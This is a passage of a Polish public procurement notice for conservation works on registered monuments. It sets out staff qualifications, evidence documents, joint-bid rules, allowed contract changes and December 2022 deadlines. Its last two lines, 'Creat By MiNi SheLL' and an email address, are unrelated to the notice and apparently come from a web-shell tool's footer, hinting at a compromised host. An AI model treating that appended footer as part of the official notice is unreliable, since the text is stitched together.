jednolitych studiów magisterskich przez co najmniej 9 miesięcy <br/> brała udział w pracach konserwatorskich, pracach restauratorskich lub badaniach<br/> konserwatorskich, prowadzonych przy zabytkach wpisanych do rejestru, inwentarz<br/> a muzeum będącego instytucją kultury. W dziedzinach nieobjętych programem <br/> studiów wyższych, pracami konserwatorskimi, pracami restauratorskimi lub <br/> badaniami konserwatorskimi, prowadzonymi przy zabytkach wpisanych do rejestru<br/> albo na Listę Skarbów Dziedzictwa, kieruje osoba, która posiada: świadectwo <br/> ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie <br/> średnie lub średnie branżowe i dyplom potwierdzający posiadanie kwalifikacji <br/> zawodowych w zawodach odpowiadających danej dziedzinie lub dyplom mistrza w <br/> zawodzie odpowiadającym danej dziedzinie oraz która przez co najmniej 4 lata brała <br/> udział w pracach konserwatorskich, pracach restauratorskich lub badaniach <br/> konserwatorskich, prowadzonych przy zabytkach wpisanych do rejestru, na Listę <br/> Skarbów Dziedzictwa, do inwentarza muzeum będącego instytucją kultury. <br/> Uwaga! <br/> Udział w pracach konserwatorskich, pracach restauratorskich, badaniach<br/> konserwatorskich, prowadzonych przy zabytkach wpisanych do rejestru i innych <br/> zabytkach oraz badaniach archeologicznych lub zatrudnienie przy tych pracach lub <br/> badaniach w muzeum będącym instytucją kultury potwierdzają świadectwa, w tym <br/> dotyczące praktyk zawodowych, oraz inne dokumenty zaświadczające udział w tych <br/> pracach, badaniach lub robotach lub zatrudnienie przy tych pracach wydane przez <br/> kierownika jednostki organizacyjnej, na rzecz której te prace, badania lub roboty były <br/> wykonywane, albo przez osobę, pod której nadzorem były wykonywane, w tym <br/> zakresy obowiązków na stanowiskach pracy w muzeum będącym instytucją kultury lub zaświadczenia wydane przez wojewódzkich konserwatorów zabytków. Udział w pracach konserwatorskich, pracach restauratorskich, badaniach konserwatorskich, prowadzonych przez dniem 26 sierpnia 2011 r. przy zabytku niewpisanym do rejestru zabytków potwierdzają świadectwa, inne dokumenty lub zaświadczenia, o których mowa wyżej. <br/>Zamawiający dopuszcza łączenie kilku funkcji przez osobę wskazaną przez Wykonawcę, pod warunkiem, że osoba ta spełnia łącznie wymagania w /w zakresach uprawnień. <br/> Ocena spełnienia w/w warunków dokonania będzie na podstawie złożonego wykazu osób określonego w punkcie 8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.2. Zamawiający wzywa Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia aktualnych na dzień złożenia podmiotowych środków dowodowych: <br/> 1) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów( Dz.U. z 2020 r. poz. 1076 i 1078), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/> przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej ( zał. nr 4)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.1. W celu potwierdzenia braku podstaw wykluczenia z postępowania oraz spełnienia warunków udziału w postępowaniu Wykonawca jest zobowiązany złożyć wraz z ofertą (zał. nr 1 ) : <br/> 1) aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu (zał. nr 2)<br/><br/>Zamawiający wzywa Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia aktualnych na dzień złożenia podmiotowych środków dowodowych: <br/>1) dokument (aktualna polisa lub inny dokument) potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą jak 100 000 zł. <br/> 2) wykaz robót budowlanych( zał. nr 5) wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających czy te <br/> roboty budowlane zostały wykonane należycie, przy czym dowodami , o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego <br/> roboty budowlane zostały wykonywane, a jeżeli Wykonawca z przyczyn niezależnych <br/> od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty, <br/> 3) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i <br/> wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakres wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zał. nr 6);</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.11. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sadowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, a Wykonawca wskazał w ofercie te dane umożliwiające dostęp do tych dokumentów.<br/>Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z wymienionych wyżej dokumentów, Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/> <br/>W przypadku Wykonawcy mającego siedzibą lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych wyżej- składa dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę (równoważne podmiotowe środki dowodowe). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 8.14. Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/> 1) W ofercie Wykonawcy ubiegający się wspólnie o udzielenie zamówienia podają nazwy <br/> Firm wszystkich Wykonawców wspólnie ubiegających się o zamówienie i wskazują <br/> Pełnomocnika do ich reprezentacji ; <br/> 2) Oświadczenie o niepodleganiu wykluczeniu oraz o spełnieniu warunków udziału w <br/> postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o udzielenie <br/> zamówienia (zał. nr 2). Oświadczenia te potwierdzają brak podstawy prawnych <br/> wykluczenia oraz spełnienie warunków udziału w postępowaniu, w jakim każdy z <br/> Wykonawców wykazuje spełnienie warunków udziału w postępowaniu; <br/> 2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/> doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą <br/> polegać na zdolnościach tych Wykonawców, którzy wykonują roboty budowlane, do <br/> realizacji których te zdolności są wymagane;<br/> 3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do <br/> oferty oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni <br/> Wykonawcy; <br/> 4) Jeżeli w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/> działa osoba, której umocowanie do jego reprezentowania nie wynika z <br/> dokumentów Krajowego Rejestru Sadowego, Centralnej Ewidencji i Informacji o <br/> działalności gospodarczej lub innego właściwego rejestru, Zamawiający żąda od <br/> Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego <br/> umocowanie do reprezentowania Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 93. . Zamawiający na podstawie art. 455 ust.1 pkt.1 ustawy Pzp przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadkach określonych szczegółowo w SWZ w punkcie 9.3 ppkt. 1) ; <br/>Strony dopuszczają możliwość zmiany wysokości wynagrodzenia należnego Wykonawcy za wykonanie przedmiotu umowy w przypadku zmiany cen materiałów lub kosztów związanych z realizacją zamówienia. Wynagrodzenie Wykonawcy może zostać zmienione poprzez zmianę cen jednostkowych zawartych w kosztorysie ofertowym stanowiącym załącznik do umowy, przy łącznym spełnieniu postanowień określonych w SWZ w punkcie 9.3 ppkt 2) , 3 ) , .4) i 5). <br/><br/>Zmiana w zakresie podwykonawstwa. Wykonawca może zmienić podwykonawcę, lub zrezygnować z Podwykonawcy. W przypadku gdy zmiana lub rezygnacja z Podwykonawcy, dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia, przedstawiając Zamawiającemu dokumenty wymagane w ofercie na potwierdzenie tego warunku, z datą nie późniejszą niż wystąpienie w/w zmian; <br/><br/> Zmiana w zakresie Personelu Wykonawcy : <br/> Zamawiający może żądać zmiany osoby pełniącej funkcję kierownik budowy oraz kierownika robót, jeżeli uzna że osoba ta nie wykonuje należycie swoich obowiązków. Wykonawca zobowiązany jest zmienić wskazaną osobę na inną osobą z wymaganymi uprawnieniami, w terminie 7 dni od dnia otrzymania żądania Zamawiającego, po dostarczeniu Zamawiającemu stosownych dokumentów potwierdzających posiadanie uprawnień przez w/w osoby do pełnienia funkcji kierownika budowy/kierownika robót. <br/> Zmiana osoby pełniącej funkcje kierownika budowy oraz kierownika robót może nastąpić poprzez pisemne oświadczenie złożone drugiej stronie. Zmiana taka nie wymaga do swojej ważności formy aneksu do umowy; <br/>8) Dopuszcza się zmianę lub rezygnację z podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 118 ust.1 ustawy Pzp, w celu wykazania <br/> spełnienia warunków udziału w postępowaniu , o których mowa w art. 112 ust. 2 ustawy Pzp, w przypadku gdy proponowany inny podmiot lub Wykonawca samodzielnie spełniają <br/> je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. Wykonawca jest zobowiązany przedstawić Zamawiającemu dokumenty <br/> wymagane w ofercie na potwierdzenie tego warunku, z datą nie późniejszą niż wystąpienie w/w zmian. <br/> UWAGA: W przypadku, gdy dokonanie zmiany wymaga zmiany dokumentacji projektowe strona inicjująca zmianę przedstawia projekt zamienny zawierający opis <br/> proponowanych zmian. <br/><br/> Zmiany dokonane z naruszeniem warunków określonych w punkcie 9.3. SWZ podlegają unieważnieniu, a na miejsce unieważnionych wchodzą postanowienia umowne w pierwotnym brzmieniu., z zastrzeżeniem art. 455 ust.1 pkt 2-4 i ust. 2 Ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-02 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com